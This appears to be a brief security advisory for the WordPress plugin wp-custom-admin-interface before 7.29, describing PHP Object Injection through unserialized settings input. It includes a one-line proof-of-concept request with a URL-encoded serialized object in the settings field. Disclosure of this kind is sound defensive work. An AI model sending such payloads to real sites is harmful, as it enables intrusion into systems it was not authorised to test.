The plugin unserialize user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.
action=import_settings&settings;=O%3a4%3a%22Evil%22%3a0%3a%7b%7d%3b&security;=6960d7bb50
CPE | Name | Operator | Version |
---|---|---|---|
wp-custom-admin-interface | lt | 7.29 |